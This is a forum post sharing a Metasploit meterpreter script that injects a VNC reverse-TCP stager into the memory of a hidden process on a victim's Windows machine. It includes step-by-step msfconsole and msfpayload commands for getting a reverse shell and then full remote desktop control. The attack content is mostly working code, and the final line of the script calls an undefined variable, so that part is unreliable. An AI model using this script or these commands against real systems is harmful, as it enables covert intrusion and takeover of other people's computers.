vnc memory injection with meterpreter

[hhmatt81]

Description:
A script that utilizes memory injection to get a VNC session without losing your meterpreter session.

I spent quite a bit of time trying to get vnc_oneport.rb working. Then finally decided that vnc.rb worked great except 1 thing. It created a file on the victims machine and you would have to manually delete it later. So I utilized the cool execution and injection feature that was in vnc_oneport.rb and ported it into vnc.rb.

This is sort of a work in progress but I'll share what I've done so far to get it working. It's not as hard as it looks as long as you know how to get a meterpreter session.

First we need to traverse to the directory that we will be putting our script into.

Open a shell and type:

Code:

cd /pentest/exploits/framework3/scripts/meterpreter/

Use whatever editor your most comfortable with here but keep the name the same.

Code:

nano vnc_mem.rb

Now copy this:

Code:

# $Id: vnc_mem.rb 12-17-2009 hdm $

#
# Meterpreter script for obtaining a quick VNC session
# Hybrid of vnc.rb and vnc_oneport.rb
# Utilizes memory functions so no file is created
# Known Issue: spawns metasploit courtesy shell on vnc server side (victim)
# You can exit out of courtesy shell easily once you obtain a vnc session
# All code written by H.D. Moore (hdm)
# Edited by hhmatt
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
        "-h"  => [ false,  "This help menu"],
        "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
        "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
#       "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
        "-e"  => [ true,    "The process to run and inject into (default: notepad.exe)"]
)

#
# Default parameters
#

runme    = "notepad.exe"
rhost    = Rex::Socket.source_address("1.2.3.4")
rport    = 4545
#autoconn = true

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
        case opt
        when "-h"
                print_line(opts.usage)
                return
        when "-r"
                rhost = val
        when "-p"
                rport = val.to_i
#       when "-D"
#               autoconn = false
        when "-e"
                runme = val
        end
end

#
# Create the agent EXE
#
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw  = pay.generate

exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("VNC stager executable #{exe.length} bytes long")


#
# Create a host process
#
pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
print_status("Host process #{runme} has PID #{pid}")
note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
mem  = note.memory.allocate(1024*32)

print_status("Allocated memory at address #{"0x%.8x" % mem}")
print_status("Writing the VNC stager into memory...")
note.memory.write(mem, raw)


#
# Setup the multi/handler
#

        mul = client.framework.exploits.create("multi/handler")
        mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
        mul.datastore['LHOST']     = rhost
        mul.datastore['LPORT']     = rport
        mul.datastore['EXITFUNC']  = 'process'
        mul.datastore['ExitOnSession'] = true

        mul.exploit_simple(
                'Payload'        => mul.datastore['PAYLOAD'],
                'RunAsJob'       => true)

#
# Execute the agent
#
print_status("Creating a new thread within #{runme} to run the VNC stager...")
note.thread.create(mem, 0)


print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})

And paste it into your editor.

Then you can save and exit:

Code:

Ctrl+o (the letter not the number zero)

Ctrl+x

Nothing more needs to be done, it will automatically load the script once metasploit starts.
So lets start Metasploit!

Code:

/pentest/exploits/framework3/./msfconsole

I'm using the reverse tcp metasploit connection from a executable payload. You can use whatever method you know or have to give you a meterpreter session.

Ok so let's get our meterpreter session started.

Code:

msf > use multi/handler

msf(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf(handler) > show options

At this point you will need to set LHOST and RPORT (remember to change these to match your network and port).
LHOST is your attacker machine and LPORT is your port to listen on.

Code:

msf(handler) > set LHOST 192.168.1.100

msf(handler) > set LPORT 81

OK. Let's start our listener now.

Code:

msf(handler) > exploit

At this point you should see something like this:

Code:

[*] Starting the payload handler...
[*] Started Reverse Handler on port 81

Now we need to run our executable on the victim machine to give us a meterpreter session.
This is how I made my exe.

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=81 X > /tmp/meter.exe

This is what you should get at the end:

Code:

meterpreter >

This is a good point to make sure your connected to the right machine.

Code:

meterpreter > ipconfig
meterpreter > getuid

If you need to know some of the main basic commands that meterpreter uses just type in a ? like this.

Code:

meterpreter > ?

OK, now to see if our script is recognized.

Code:

meterpreter > run vnc_mem.rb -h

This should post the scripts help options.
Here's what I get:

Code:

OPTIONS:

    -e <opt>  The process to run and inject into (default: notepad.exe)
    -h        This help menu
    -p <opt>  The port on the remote host where Metasploit is listening (default: 4545)
    -r <opt>  The IP of the system running Metasploit listening for the connect back

Looks good lets give it a run:

Code:

meterpreter > run vnc_mem.rb

Success!
At this point you should've recieved a new window open in tightvnc with your victims desktop and full control!
You can also check back on meterpreter and see that you still have an active session. Sometimes you have to hit enter once or twice to see the prompt.

Hope you get some useful information from this and happy hacking!

[cRaZylilmuffin]

cool ill have to try it out

[xorred]

great work dude! Nice merge between the rb's

[hhmatt81]

Thanks, I'm glad you liked it.